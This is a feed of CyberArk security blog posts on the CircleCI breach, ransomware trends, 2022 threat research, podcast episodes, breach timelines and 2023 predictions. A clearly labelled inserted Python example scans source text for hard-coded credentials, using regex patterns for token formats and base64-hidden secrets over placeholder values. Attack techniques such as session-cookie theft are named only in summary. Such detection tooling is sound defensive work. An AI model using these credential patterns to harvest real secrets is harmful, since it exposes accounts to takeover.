  • Development time is wasted rotating secrets: Developers everywhere are now busy searching their code and updating hundreds or thousands of secrets spread across their development and production environment. One developer on Reddit said, “there goes the rest of my week…My company deploy[s] several hundred websites through CircleCI, each with their own secrets…”

Why Developers Still Write Secrets into Source Code

Storing secrets in code is certainly not recommended, but many people sheepishly admit to seeing secrets in production code before, even if they personally would never do it. Some of the reasons for this are:

  • Test code improperly moved to production: The code was only meant to be part of a test application, sandbox environment or the secret was meant to be temporary (“I will remove it later”).
  • Lack of secure development training: The developer who wrote the code isn’t aware of the best practices for safely handling secrets in code.
  • False security assumptions: The developer falsely assumes the secrets are protected by something else like the code repository (GitHub) access controls, base64 encoding, Kubernetes Secrets or encryption at rest only.
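The three false assumptions above (repository access controls, base64 encoding, Kubernetes Secrets or encryption at rest) and the development time spent hunting for secrets after a breach both argue for catching embedded credentials before they are committed. The following is an added example, not code from CyberArk or from the CircleCI incident: a small Python scanner run over a constructed four-file repository that flags credential-looking literals, well-known token formats and base64-wrapped secrets, skips values that are runtime lookups rather than literals, masks what it reports, and ends with the hardened pattern of resolving the secret at runtime from an injected source (here the process environment, standing in for a secrets-manager fetch). All file contents, names and credential values are constructed placeholders; the `ghp_` and `AKIA` prefixes are the publicly documented formats of GitHub personal access tokens and AWS access key IDs.

```python
"""Added example: detect hard-coded secrets in source text and show the
runtime-injection alternative. Every sample input below is constructed for
this demo; nothing here is a real credential or code from any project."""
from __future__ import annotations

import base64
import binascii
import os
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample "repository": three files embed secrets in the ways the
# post describes (plain literal, well-known token format, base64 "hidden"),
# and one file resolves the secret at runtime instead.
SECRET_B64 = base64.b64encode(b"password=example-constructed-value").decode()
SAMPLE_REPO = {
    "deploy.ps1": '$token = "ghp_EXAMPLEexampleEXAMPLEexampleEXAMPLE12"\n'
                  'Invoke-RestMethod -Headers @{Authorization="token $token"} -Uri $api',
    "settings.py": 'DEBUG = False\nDB_PASSWORD = "example-constructed-pw-1"\n'
                   'AWS_ACCESS_KEY_ID = "AKIAEXAMPLEEXAMPLE01"',
    "config.yaml": f"service: billing\nlogin_blob: {SECRET_B64}\n",
    "app.py": 'import os\nDB_PASSWORD = os.environ["DB_PASSWORD"]  # injected at runtime\n',
}

# A secret-looking name assigned a literal of at least 8 non-space characters.
ASSIGNMENT = re.compile(
    r"(?i)\b\w*(password|passwd|pwd|secret|token|api[_-]?key|access[_-]?key)\w*"
    r"\s*[:=]\s*[\"']?([^\"'\s]{8,})")
# Publicly documented credential formats (values in the sample are constructed).
FORMATS = {
    "github_token": re.compile(r"\bghp_[A-Za-z0-9]{20,}\b"),
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
}
# A bare base64 blob long enough to hide a credential.
B64_BLOB = re.compile(r"\b[A-Za-z0-9+/]{24,}={0,2}")
# Values that are runtime lookups, not literals: these are the hardened pattern, not a finding.
LOOKUP = re.compile(r"(?i)environ|getenv|vault|secretsmanager|\$\{|\{\{")


@dataclass(frozen=True)
class Finding:
    path: str
    line: int
    kind: str
    hint: str  # masked, so the report itself never leaks the secret


def mask(value: str) -> str:
    """Keep only a short prefix so a finding can be located but not reused."""
    return value[:4] + "****"


def try_b64(blob: str) -> Optional[str]:
    """Decode a base64 candidate; return printable text or None."""
    try:
        text = base64.b64decode(blob, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None


def looks_like_secret(text: str) -> bool:
    return bool(ASSIGNMENT.search(text) or any(rx.search(text) for rx in FORMATS.values()))


def scan_text(path: str, text: str) -> list[Finding]:
    findings: list[Finding] = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for kind, rx in FORMATS.items():
            for m in rx.finditer(line):
                findings.append(Finding(path, lineno, kind, mask(m.group(0))))
        for m in ASSIGNMENT.finditer(line):
            value = m.group(2)
            if LOOKUP.search(value):  # e.g. os.environ[...]: resolved at runtime, fine
                continue
            findings.append(Finding(path, lineno, "hard_coded_assignment", mask(value)))
        for m in B64_BLOB.finditer(line):
            decoded = try_b64(m.group(0))
            if decoded and looks_like_secret(decoded):  # encoding is not protection
                findings.append(Finding(path, lineno, "base64_encoded_secret", mask(decoded)))
    return findings


def scan_repo(repo: dict[str, str]) -> list[Finding]:
    return [f for path, text in repo.items() for f in scan_text(path, text)]


def load_secret(name: str, env: Optional[dict] = None) -> str:
    """Hardened pattern: fetch the credential at runtime from an injected source
    (the process environment here, a stand-in for a secrets-manager lookup),
    so nothing sensitive ever lives in the repository."""
    source = os.environ if env is None else env
    if name not in source:
        raise RuntimeError(f"secret {name!r} not provided; inject it at deploy time")
    return source[name]


if __name__ == "__main__":
    for f in scan_repo(SAMPLE_REPO):
        print(f"{f.path}:{f.line}: {f.kind} ({f.hint})")
```

Running the block prints one masked finding per hit and nothing for `app.py`; the same `scan_repo` call can gate a pre-commit hook or a CI step, and the decoded-base64 check is what catches the "it's encoded, so it's safe" assumption.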

Attackers Are Gonna Attack, so Hunters Need to Hunt

Under constant cybersecurity threats, enterprises need to focus on what they can control to mitigate their risk and potential exposure. Because there is no well-defined IT perimeter, the threat landscape is now asymmetric, making a Zero Trust security mindset essential. Protecting non-human/machine identities and the secrets that represent them is critical to defending against the next attack. Any static credential or secret needs to be removed from all scripts and source code. Security teams need to holistically manage access across the entire enterprise without silos or blind spots, with the ability to automatically rotate credentials as needed. A centralized secrets management system is the best option for authenticating, authorizing and auditing non-human access because it allows organizations to fully understand who has access to what and to automatically rotate or revoke access as needed.

Editor’s note, Jan. 17, 2022: After this blog post was published, CircleCI disclosed additional details on how the initial breach started – with malware on an employee laptop that allowed the attackers to keep the employee’s sessions open and active, without reauthorizing or running MFA precautions. This new information only underscores the importance of a holistic Identity Security strategy that stops breaches where they start – at the endpoints – by preventing credential, password, cookie and other types of tokens (especially post-MFA tokens) theft with a solution like CyberArk Endpoint Privilege Manager. A robust Identity Security solution also limits the blast radius of the initial phase of a breach by managing the secrets attackers frequently use to expand breaches deep into the heart of the enterprise.

]]>
Six Takeaways from Recent Ransomware Attacks https://www.cyberark.com/blog/six-takeaways-from-recent-ransomware-attacks/ Wed, 11 Jan 2023 17:00:50 +0000 https://www.cyberark.com/?p=138778

2022 ransomware attack learnings can inform 2023 cybersecurity strategies, helping organizations combat threats and reduce risk with greater confidence.

The CyberArk 2022 Identity Security Threat Landscape Report shows the ransomware attack vector continues to be a cybercrime hot spot, but the scale is staggering: 73% of global IT security decision-makers reported at least one ransomware attack on their organization in the last 12 months. Nearly 100% claim to have a defense-in-depth strategy in place to combat ransomware, which is encouraging. But since there’s always room for improvement, I dug into the data to understand what made some organizations more attractive to ransomware actors than others, and what is (and isn’t) working when it comes to ransomware prevention.

But first, a quick 2022 ransomware recap …

Ransomware was more prolific than ever in 2022, fueled by ransomware-as-a-service (RaaS) groups like ALPHV (BlackCat) and Black Basta, as well as the return of the infamous REvil organization.

The number of ransomware-based breaches grew by 41%, with attacks taking 49 days longer than average to identify and contain, according to IBM’s 2022 Cost of a Data Breach report. The same report found that destructive ransomware attacks added more than USD $430,000 to the cost for victim organizations.

This sustained ransomware activity put increased pressure on supply chains, disrupted operations and caused reputational damage. Many organizations opted to pay ransoms despite widespread guidance against the practice. However, major incidents throughout 2022 underscored the fact that giving in to ransomware demands further perpetuates attacks.

99% of orgs accelerated digital initiatives

All the while, organizations ramped up digital and IT initiatives (continuing the tectonic shift called digital transformation), creating a massive surge in digital identities and expanding the attack surface. It only takes one compromised human or machine identity to launch an attack, and our data shows ransomware actors took full advantage of this by targeting companies of all sizes and sectors.

A ransomware attack analysis: Organizations in the crosshairs share six commonalities

Though ransomware attacks didn’t discriminate based on organizational size or sector, a deeper dive into the CyberArk 2022 Identity Security Threat Landscape Report reveals several notable differences between organizations targeted by ransomware attacks and those not targeted in the last 12 months:

1. Overly generous access provisioning. In targeted organizations, 56% of workforce users had access to sensitive corporate data, compared to only 39% in organizations not targeted. Seventy-five percent of targeted organizations granted non-human accounts/bots access to sensitive data; this percentage drops to 50% in organizations not targeted by ransomware attacks.

Organizations need more effective strategies to manage sensitive access and enforce least privilege to align with the Zero Trust “trust nothing, verify everything” philosophy.

75% of targeted orgs gave sensitive access to bots

2. Behind-the-curve cybersecurity investments. Eighty-two percent of security leaders in targeted organizations said their company prioritized business operations over robust cybersecurity in the last 12 months (70% of security leaders in non-targeted organizations agreed). Additionally, these security leaders were 13% more likely to say their recent cybersecurity decisions contributed to new areas of vulnerability.

Cybersecurity can’t take a back seat to digital investments because, ultimately, positive business and customer outcomes hinge on both.

3. More churn-related risk. Seventy-four percent of security leaders at targeted organizations agreed the accelerated rate of employee churn and termination caused security issues, compared to 52% of security leaders at non-targeted organizations.

When someone leaves an organization, their access must be deleted immediately and automatically, not left to periodic reviews.

4. Less cybersecurity confidence. Organizations that experienced ransomware attacks displayed less confidence about their cybersecurity overall. Security leaders were 22% more likely to say their organization was susceptible to carefully crafted attacks, such as phishing, and 27% more likely to say their organization cannot prevent attackers from accessing critical data and assets 100% of the time, compared to leaders at non-targeted organizations.

There’s no silver bullet for ransomware, but with an assume breach mindset, a strong defense-in-depth approach and an identity focus, organizations can confidently drive greater cyber resilience.

Targeted orgs less cyber confident

5. Irregular breach reporting. Both targeted (92%) and non-targeted (91%) organizations paid nearly the same amount of attention to revisiting their cybersecurity strategy and incident response planning. But that similarity ends when it comes to reporting on breaches. It’s alarming to see nearly three-quarters (71%) of targeted organizations (versus 39% of non-targeted) said they do not report successful data breaches to stakeholders, which places organizations at greater risk for non-compliance fines and penalties.

Prioritize transparent reporting and communication. Review cyber incident response strategies and playbooks rigorously and involve stakeholders in improving them.

6. Inadequate Identity Security controls to protect cloud assets. Significantly fewer targeted organizations (44%) had Identity Security controls in place to protect cloud infrastructures and workloads compared to non-targeted organizations (60%). This is despite more than half of respondents indicating their organization had accelerated cloud migration over the past year.

Don’t wait until your organization is drowning in cybersecurity debt to address cloud workload security and hold up your end of the Shared Responsibility Model. A proactive, automated approach today can help you avoid major issues tomorrow.

Interestingly, nearly 100% of both targeted and non-targeted groups said they had a defense-in-depth strategy in place, using multiple layers of security to reduce vulnerabilities, contain threats and mitigate risk. Yet there wasn’t broad consensus on the most effective defense-in-depth components, as shown below. What stood out to me is that slightly more targeted organizations view least privilege controls, application control and red teaming as most effective. This suggests security teams recognize (perhaps with the benefit of hindsight) that threat actors will seek out ways to circumvent MFA and other existing security controls, and are placing stronger emphasis on ways to minimize the blast radius of attacks.

These varied perspectives also remind us that ransomware defense isn’t just about technology. Even the most advanced detection tools can’t stop every piece of ransomware from running, every single time. Overall system hardening, systematic attack surface reduction, a consistent approach to asset security and fundamental (also called “basic” by security practitioners) security best practices, such as local admin rights removal, can dramatically improve an organization’s ability to withstand a ransomware attack. Everyone and everything — people, processes and technology — play roles in effective (and realistic) ransomware prevention strategies that focus on stopping inevitable attacks before they cause harm.

As we move forward in 2023, consider how Identity Security countermeasures can help your organization improve ransomware readiness and reduce risk exposure. To delve deeper, read our full report findings — including respondents’ top five ransomware protection takeaways — in “Ransomware Attacks: What Can We Learn From Them?” And as a contributing partner of the EUROPOL European Cybercrime Centre’s NoMoreRansom Project, we also recommend browsing these ransomware FAQs, mitigation steps and free decryption tools.

]]>
CyberArk Labs’ 2022 Threat Research in Review https://www.cyberark.com/blog/cyberark-labs-2022-threat-research-in-review/ Tue, 03 Jan 2023 14:00:25 +0000 https://www.cyberark.com/?p=138416 CyberArk Labs’ 2022 Threat Research in Review

Cyber defenders need timely, accurate threat intelligence to protect their organizations. This is what drives our CyberArk Labs team to produce innovative research, expose new attack methods and encourage greater industry collaboration.

While there was no shortage of material to work with last year, here’s a quick look at CyberArk Labs’ 2022 threat research highlights reel:

1. Analyzing Conti Group TTPs and Why They Matter

In 2022, the Ukraine conflict drove increased attacks against critical infrastructure – including those using destructive HermeticWiper malware – along with deeper scrutiny of certain criminal gangs. After a Conti ransomware group member leaked troves of sensitive inside information, CyberArk Labs was one of the first to analyze content on the group’s tactics, techniques and procedures (TTPs) and their significance. Within a few months of the leak, Conti disbanded, though many of its former members are still at work today.

2. Extracting Clear-Text Credentials From Chromium’s Memory

Attackers and credential-stealing malware often target browsers (which seemingly know everything about us) to compromise stored credentials and session cookies. If hijacked, these cookies could allow threat actors to bypass multifactor authentication (MFA) and single sign-on (SSO) and access critical business applications. In 2022, CyberArk Labs researchers discovered a new attack technique for extracting sensitive data from the Chromium browser’s memory and designed a credential protection plan to aid defenders.

3. Hunting for PwnKits in Linux

PwnKit vulnerability CVE-2021-4034 – a critical privilege escalation vulnerability in the Polkit Linux module – continues to generate significant attention nearly a year after public disclosure. Industry researchers and government agencies urge teams to address this critical flaw if they haven’t already. Security teams can use the PwnKit-Hunter tool to scan Linux-based machines for the Polkit vulnerability, and browse this library for other free threat hunting tools developed by CyberArk Labs.

4. Attacking RDP From the Inside: The Leaky Named Pipes Saga

RDP is an extremely popular protocol for remote access to Windows machines, and an ongoing focus area for CyberArk Labs. In early 2022, the team uncovered a vulnerability by abusing named pipes for smart card hijacking, unauthorized file system access to client machines and more. Our team reported the vulnerability to Microsoft in a coordinated disclosure process and a patch was released. However, CyberArk Labs identified an attack vector that was not addressed in the fix, making the vulnerability still exploitable under certain conditions. Learn more about this unconventional attack vector and the latest patch to address these findings.

5. Digging Into Decentralized Identity: The Good, the Bad and the Ugly

Years of problematic passwords and endemic identity fraud highlight the need for stronger, more secure authentication methods. Decentralized identity (DID) offers some exciting possibilities — but it also presents new attack surfaces. In this two-part research piece, CyberArk Labs explores key DID concepts, benefits and security considerations and a critical vulnerability uncovered in Sovrin, the most popular DID network in production.

6. Analyzing Malware: Exploring Matanbuchus and Fantastic Rootkits (and Where to Find Them)

Threat research and red teaming discoveries often lead to new detections, creating the need for new bypasses, in which more detections are often discovered… it’s a game that never ends. In parts one and two of CyberArk Labs’ malware analysis using hook heaps, stomps and return addresses, you’ll see why threat research is as much about the journey as it is about the destination. While you’re at it, take an inside look at the quirky Matanbuchus loader’s tricks and loading techniques. And finally, in this in-depth rootkits research, explore highly evasive malware, how rootkits are built and where to find them.

7. Abusing Terminal Emulators with ANSI Escape Characters

Speaking of threat research twists and turns, what started out as a project on terminal emulators took a sharp turn when CyberArk Labs discovered a remote denial of service (DoS) vulnerability by abusing a Windows system call indirectly. Things snowballed from there, with their research leading to nine total vulnerabilities in different terminals. Buckle up – you’re in for a wild ride.

8. Uncovering Weaknesses in Cloud-Native Tech Stacks

Many of CyberArk Labs’ 2022 projects focused on modern DevOps methods and potential areas of risk. For instance, the team discovered an insufficient permissions handling vulnerability in Docker engine during a Linux exploration. They also created a new open-source GUI tool, “RPCMon,” based on Windows container communication research, which can monitor RPC calls and show their function names. And, most recently, the team analyzed a vulnerability in Istio to help organizations better understand service mesh concepts, Istio gateways and how to avoid potentially dangerous caching pitfalls.

9. Trusting RPA Bots With Heavily Guarded Secrets: Have We Gone too Far?

Industries from healthcare to financial services use robotic process automation (RPA) to automate repetitive tasks and free up humans so they can focus on more meaningful work. But when they do, access credentials and secrets to enterprise applications are placed in the “hands” of robots. Can these RPA bots really be trusted? Our team dug in to find out. Here’s what they learned.

10. Researching Third-Party Linux Kernel Drivers: It’s All Fun and Games Until …

Since our CyberArk Labs team loves gaming almost as much as we love finding bugs, we recently analyzed an open-source Linux driver used to make popular gaming devices. We found a buffer overflow vulnerability that could be exploited to cause a denial of service and possibly an elevation of privileges – a significant finding due to the vast number of product users around the world.

11. Strengthening the Cybersecurity Community as a CVE Numbering Authority

And finally, to further enhance our ability to share accurate, timely threat intelligence with the cybersecurity community, CyberArk Labs was designated by the CVE Program as a CVE Numbering Authority (CNA). As a CNA, CyberArk Labs is now authorized to assign CVE IDs to newly discovered vulnerabilities and publicly disclose information about these vulnerabilities through CVE Records. And we’re in great company: According to a SecurityWeek analysis, more than 50 new CNAs were added in 2022, bringing the total to 260 CNAs across 35 countries – all united by a shared commitment to advancing global cybersecurity collaboration.

What CyberArk Labs and the broader threat research community uncovered in the last 12 months may be just the tip of the iceberg – and why we can’t let up efforts to support ongoing awareness and cybersecurity vigilance. With 2022 in the rear view, we’re gearing up for an eventful year ahead. Read our 2023 cybersecurity predictions and follow the CyberArk Threat Research Blog for the latest CyberArk Labs projects.

]]>
Trust Issues Podcast: A 2022 Cyber Episodes Replay https://www.cyberark.com/blog/trust-issues-podcast-a-2022-cyber-episodes-replay/ Thu, 29 Dec 2022 14:00:37 +0000 https://www.cyberark.com/?p=138396 Trust Issues Podcast: A 2022 Cyber Episodes Replay

Since launching last spring, the CyberArk Trust Issues Podcast has covered a range of top-of-mind cybersecurity subjects. Whether you’re interested in CISO perspectives, cutting-edge threat research or best practices for advancing your Identity Security strategy, you can find them in our on-demand lineup of 2022 episodes. Check them all out below and stay tuned for new episodes dropping regularly.

EP 1: Talking Ransomware

Thanks to cheap plug-and-play ransomware kits, anyone with a credit card can get in on cyber extortion action. In the premiere episode of Trust Issues, Andy Thompson, advisor and evangelist at CyberArk Labs, describes what attack commoditization means for defenders – and what they can do.

Listen Now

EP 2: Transhumanism: Charting the Cybersecurity Frontier

Digital identities are typically split into two distinct categories: Human and machine. But there’s one notable intersection: Cyborg. CyberArk technical evangelist, white hat hacker and CyberArk’s resident transhuman, Len Noe, explores the collision between human augmentation and cyber warfare.

Listen Now

EP 3: Restoring Trust in Healthcare

Trust is central to every healthcare interaction – between patients and clinicians and across interconnected IT ecosystems. Mike Towers, chief digital trust officer at Takeda Pharmaceuticals, talks about tech’s role in building transparent, equitable healthcare systems and driving better outcomes for all.

Listen Now

EP 4: How Diversity Can Help Combat Attacker Innovation

Combatting attacker innovation with innovation is only possible through collaboration and diversity of thought and backgrounds. Melissa Carvalho, vice president of identity and access management at Royal Bank of Canada, describes the importance of diversity and inclusion in cybersecurity.

Listen Now

EP 5: Preparing for the Cyber Unknown

How do you prepare for the unknown – for that metaphorical “Iron Mike” punch to the face? And what do you do when it happens? Shay Nahari, vice president of red team services at CyberArk, challenges traditional ways of thinking to help teams see things differently and get ready for anything.

Listen Now

EP 6: Protecting Critical Infrastructure

Securing critical infrastructure that powers our modern way of life can be a sleepless job, as Carla Donev, vice president and CISO at NiSource, knows well. She describes the evolving threat landscape and how building safer, more resilient operations is key to preserving trust.

Listen Now

EP 7: Cyber Attack Cycle Deconstruction

Meet Lavi Lazarovitz, head of security research at CyberArk Labs. He deconstructs an attack cycle, examines post-exploit methods and gets inside an attacker’s mind to help defenders understand what they’re up against – so they can stay a step ahead.

Listen Now

EP 8: Seeing the Big Picture with Identity Security

Today, machine identities outnumber human identities by 45:1, and any one of these identities can be compromised by an attacker. CyberArk Founder, Chairman and CEO Udi Mokady speaks about the growing urgency to address this identity challenge with an impactful, unified security approach.

Listen Now

EP 9: Living and Breathing Telecom Trust

Thomas Tschersich, chief security officer of Deutsche Telekom (parent company of T-Mobile) and chief technical officer of Telekom Security, breaks down the new rules of data privacy and protection and how telecommunication providers must live and breathe trust as they operate critical infrastructure.

Listen Now

EP 10: Skating to Where the Cyber Puck’s Going, Not Where it’s Been

Like sports, cybersecurity requires practice, strategy and anticipation. Clarence Hinton, chief strategy officer and head of corporate development at CyberArk, talks about looking toward the future and preparing for the unknown. Because it’s about skating to where the puck’s going – not where it’s been.

Listen Now

EP 11: Step Away From the QR Code and Listen to This

QR codes are accessible, easy to produce and, seemingly, here to stay. They’re also a perfect way for cyber criminals to snag your personal information. Len Noe returns to the podcast to share important safety tips, and what you need to know before scanning that code with your smartphone.

Listen Now

EP 12: K-12 Schools in Ransomware Crosshairs

At the start of the 2022 school year, ransomware actors disproportionately targeted the education sector, especially K-12. We explore why, what attackers are after and what schools can do.

Listen Now

EP 13: Cyber Fundamentals: Where Things Fall Apart

Bryan Murphy, senior director of architecture services and incident response at CyberArk, goes back to the basics, revisiting “cybersecurity hygiene” best practices to help organizations mitigate the risk of cyber infection and boost overall security health.

Listen Now

EP 14: Humanizing Cybersecurity

Cybersecurity can be a tough job. Practitioners are often stretched thin as they protect against the unknown day after day. Kirsten Davies, CISO at Unilever, shines a spotlight on mental health issues in the industry, advocates against stigma and emphasizes the critical human side of cybersecurity.

Listen Now

EP 15: Navigating a Ransomware Crisis in Latin America

The 2022 ransomware attacks on Costa Rica wreaked havoc on government and healthcare systems, crippled the economy and prompted a national state of emergency. Frontline defender Vinicio Chaves Alvarado, acting CISO at BAC Credomatic, describes the journey of restabilizing and rebuilding trust.

Listen Now

EP 16: Beware of Stolen Cookies for MFA Bypass

Shay Nahari and Andy Thompson revisit the show to talk about a major attack trend. SaaS apps are everywhere, and attackers are increasingly targeting session cookies to bypass authentication and MFA and hijack accounts. Tune in to learn what to watch out for and how to protect your organization.

Listen Now

EP 17: Highmark Health CISO on the Power of Storytelling

Omar Khawaja, CISO at Highmark Health, shares his nine-year journey of cultivating talent and creating a strong cybersecurity culture at a leading healthcare organization. Learn how the power of language, relationships and story can be used to effectively communicate and drive organizational change.

Listen Now

Find Trust Issues on Spotify, Apple Podcasts, Amazon Music, Google Podcasts or wherever you get your podcasts.

]]>
Revisiting Major 2022 Breaches and Cybersecurity Events https://www.cyberark.com/blog/revisiting-major-2022-breaches-and-cybersecurity-events/ Tue, 27 Dec 2022 14:00:18 +0000 https://www.cyberark.com/?p=138283 Revisiting Major 2022 Breaches and Cybersecurity Events

Before we ring in the new year, we’re reflecting on some of the biggest cybersecurity events of 2022.

It’s been a stressful 12 months for security teams, to say the least. Many open cybersecurity jobs remained unfilled, straining staff while they grappled with remote workforce risks, accelerated cloud adoption, mounting cybersecurity debt and heightened exposure to ransomware and software supply chain attacks. Meanwhile, the Ukraine conflict created a host of new and formidable challenges.

Identity compromise was a familiar theme across major 2022 breaches – from a high-profile incident involving a leading identity provider, to the rise in deceptive “MFA fatigue” phishing, to a teenager’s headline-grabbing attack on a major ride sharing service. Tackling identity-centric challenges was top of mind for government leaders and business executives alike. In some cases, conversations about the “trust no identity, verify every identity” Zero Trust imperative turned to action. Governments enacted stronger cybersecurity regulations to harden networks and protect access to sensitive data and critical infrastructure. Private sectors increased supply chain scrutiny to identify areas of weakness, such as embedded credentials and unmanaged secrets. Under extreme pressure, cyber insurance providers continued to ramp up requirements, making it even harder for organizations to purchase or renew policies. And several landmark legal cases placed breach responsibility and disclosure obligations on individuals, suggesting major changes ahead.

Below, we revisit the past year in cybersecurity, because history tends to repeat itself until we learn from it and make changes. While attack methods and threats continue to evolve, focusing on identity – the one true constant – is a solid cybersecurity strategy for 2023 and beyond.

January 2022 Breaches

  • Attackers breach a global humanitarian organization, gaining access to sensitive data and disrupting services around the world.
  • A U.S. mass media conglomerate discovers a persistent cyberattack targeting journalists in a suspected espionage campaign.
  • An attack on a global cryptocurrency exchange results in unauthorized withdrawals worth $35 million.
  • A multi-month attack spree by Lapsus$ Group compromises several leading tech companies. After the dust settles, an identity vendor is disclosed as the initial attack vector.

February 2022 Breaches

March 2022 Breaches

April 2022 Breaches

  • Ransomware attacks wreak havoc on Costa Rica, prompting the country’s president to declare a national state of emergency.
  • A former employee at a major mobile payment app downloads sensitive files containing personal customer information, impacting up to 8 million people.

June 2022 Breaches

July 2022 Breaches

  • Attackers breach Italy’s energy agency, compromising servers, blocking access to systems and suspending access to its website for a week.

August 2022 Breaches

September 2022 Breaches

October 2022 Breaches

November 2022 Breaches

December 2022 Breaches

  • Another large Australian telecoms firm reports a data breach impacting 132,000 customers resulting from a “misalignment of databases.”
  • Security researchers report a spike in devices infected with the TrueBot malware downloader created by the Silence criminal group.
  • Back-to-back attacks on a popular ride sharing company and then a large cryptocurrency exchange underscore third-party vendor security risks.

]]>
2023 Cybersecurity Trends We’re Tracking https://www.cyberark.com/blog/2023-cybersecurity-trends-we-re-tracking/ Fri, 16 Dec 2022 14:00:35 +0000 https://www.cyberark.com/?p=137870

Cybersecurity doesn’t happen in a vacuum. Evolving attack trends, world events, regulatory changes, shifting organizational priorities and many other factors influence enterprise programs. With 2023 just around the corner, cybersecurity teams are considering them all carefully as they chart their course.

We asked members of the CyberArk team to weigh in on top trends influencing 2023 cybersecurity strategies. Here’s what they had to say about new (or reemergent) challenges and opportunities ahead.

First up, a look at how rising geopolitical risk is impacting cybersecurity leaders’ bottom lines.

“As big banks predict a gloomy economic outlook for 2023, CISOs are being asked to do even more with less. Security leaders’ need to manage ever-growing business risk while flat-lining (or even slashing) operational spending will likely drive further consolidation across the cybersecurity market and accelerate cloud adoption to maximize efficiencies.” – David Higgins, Senior Director, Field Technology Office, CyberArk

During this turbulent economic time, major cloud service providers (CSPs) and their partners are focusing on interoperability to help customers cut costs and minimize friction.

“As evidenced at last month’s AWS re:Invent event, major cloud service providers (CSPs) are investing heavily in making services more flexible. This enables organizations to extend existing tech investments, such as their own security tools, throughout their hybrid cloud environments. From a practical standpoint, this means security teams don’t have to learn another system, toggle between another interface or hire specialized experts to bridge skills gaps. More security interoperability translates to more effective risk reduction in the cloud.” – Sam Flaster, Product Marketing Team Lead, PAM, CyberArk

Zoom back from the major CSPs to consider the much larger (and constantly expanding) cloud security ecosystem, and there’s likely to be at least one major shakeup ahead.

“Billions of dollars have been invested in cloud security, creating numerous unicorns along the way. However, despite the plethora of acronyms (i.e., CSPM, CIEM, CWPP, CNAP), we are still in the very early innings. As cloud security requirements come into sharper focus and investors lose patience with companies who generate massive losses, there will be at least one high-profile cloud security vendor implosion in the coming year.” – Clarence Hinton, Chief Strategy Officer, Head of Corporate Development, CyberArk

From the cloud to the CI/CD pipeline, cyberattacks continue to surge, but the motivations behind them are changing. History shows that times of economic uncertainty bring more financially driven criminal activity. Thanks to commoditized ransomware, the barrier to entry is lower than ever, and even unskilled attackers can make cash fast.

“2022 was the worst year for ransomware to date and we can expect more of the same in 2023 – except motivations will shift from ideological to financial, causing a spike in hit-and-run-style attacks made possible by readily available RaaS and access as a service.” – Daniel Schwartzer, Chief Product Technologist, CyberArk

Meanwhile, the ongoing Ukraine conflict continues to drive increased threats and cyberattacks on critical infrastructure, creating heightened urgency for collaboration. For instance, just this month more than 1,000 global cyber professionals from NATO member countries came together to conduct cyberattack simulations on critical infrastructure to test response capabilities.

“More concerned countries are banding together to combat cyberterrorism and strengthen defenses to protect critical infrastructure and citizens. This push will extend to the private sector in the coming year, with enterprise organizations answering the call to help bring systems back online after attacks and fending off future threats to our modern way of life. As global cyber collaboration increases, the stakes will become higher for those unwilling to join the fight.” – David Higgins, Senior Director, Field Technology Office, CyberArk

As it becomes more difficult to keep attackers out of critical infrastructure environments, governing bodies and insurance carriers are stepping up specific cybersecurity requirements that emphasize threat detection and response capabilities inside the network. To meet these requirements and defend against attacks, organizations must find ways to verify, manage and secure identities continuously.

“More organizations are falling within the scope of heightened cybersecurity requirements for the first time, signaling major compliance changes ahead. For example, Australia’s expanded Security of Critical Infrastructure Act (SOCI) now encompasses 11 sectors and places stringent cybersecurity requirements on critical infrastructure owners/operators as well as the businesses that have a direct interest in critical infrastructure assets. And many businesses operating in Europe are assessing their cybersecurity activities and evaluating their governance frameworks as they prepare to meet significantly expanded requirements outlined in the NIS2 Directive.” – David Higgins, Senior Director, Field Technology Office, CyberArk

Rising regulatory requirements don’t stop at cybersecurity. Environmental sustainability is becoming a strategic imperative for businesses and guidelines for corporate disclosures are coming into focus.

“Corporations’ net zero commitments are set to double between 2022 and 2023 – and the pressure is on to back up these pledges with real action. Expect to see value chain emissions reporting requirements intensify in the next 12 months, with mandates for proof of carbon footprint labels and other validation methods becoming more mainstream for both consumer and enterprise products and services.” – Daniel Schwartzer, Chief Product Technologist, CyberArk

One thing that won’t change in 2023 is remote work. It’s here to stay, which may force some security teams to backtrack to address cybersecurity debt.

“In the rush to support work-from-home requirements, many organizations got VPN access up and running and ‘checked the box’ during the pandemic. But did they really check it? Three years later, workers are still logging on from home using corporate devices (and risky habits like using default wireless router passwords persist). What impact will the recent wave of corporate layoffs and departures have on all those corporate assets sitting in people’s bedrooms? We may start to understand in the months ahead.” – Chris Maroun, Senior Director, Field Technology Office, CyberArk

Are organizations ready to face these cybersecurity challenges in the months ahead? Many C-level executives are optimistic as they map security spending decisions to key 2023 priorities. They recognize an identity-centric security approach isn’t just about protection, it’s about business enablement. Yet recent CyberArk Identity Security Maturity Model research reveals some skepticism from other business stakeholders, suggesting a need for more communication and program insights.

“C-level executives are increasing spend on Identity Security tools and services as part of their overall cybersecurity budgets. These investments are expected to improve identity-related security capabilities such as identifying anomalous behavior, reducing security incident response time and increasing agility. Our research shows that 15% more C-level respondents believe these investments have improved nearly all identity-related security capabilities than other (VP, Director, etc.) respondents. In the near future, C-level executives will recognize this ROI perception gap between investments and implementation and demand a regular review of identity-related security metrics to validate investments.” – Amita Potnis, Director, Brand and Thought Leadership, CyberArk

Are you tracking other 2023 cybersecurity trends? Share your thoughts on Twitter @CyberArk – we want to hear them.

Latest Uber Breach Underscores Third-Party Vendor Security Challenges
https://www.cyberark.com/blog/latest-uber-breach-underscores-third-party-vendor-security-challenges/ (Thu, 15 Dec 2022 14:00:27 +0000)

Uber is back in the spotlight, this time for a breach involving a third-party vendor. According to reports, an attacker accessed the vendor organization’s public cloud backup server, obtaining and then leaking sensitive Uber data, including information on more than 77,000 employees. Just days later, a large cryptocurrency exchange disclosed a data leak of over 5.7 million emails that stemmed from an attack on a third party.

Such stories are unsettling: sober reminders that a weakness in any third-party vendor could make your organization the next big headline. While the “whodunit” and “how” questions swirl around these high-profile incidents, many security teams are asking how to protect their critical systems and data from attacks that arrive through third-party vendors.

While I wish I could give them a simple checklist, there is no easy way to erase third-party risk. However, I can offer seven observations and best practices based on our CyberArk Remediation Services team’s work in helping organizations recover from some of the world’s largest breaches:

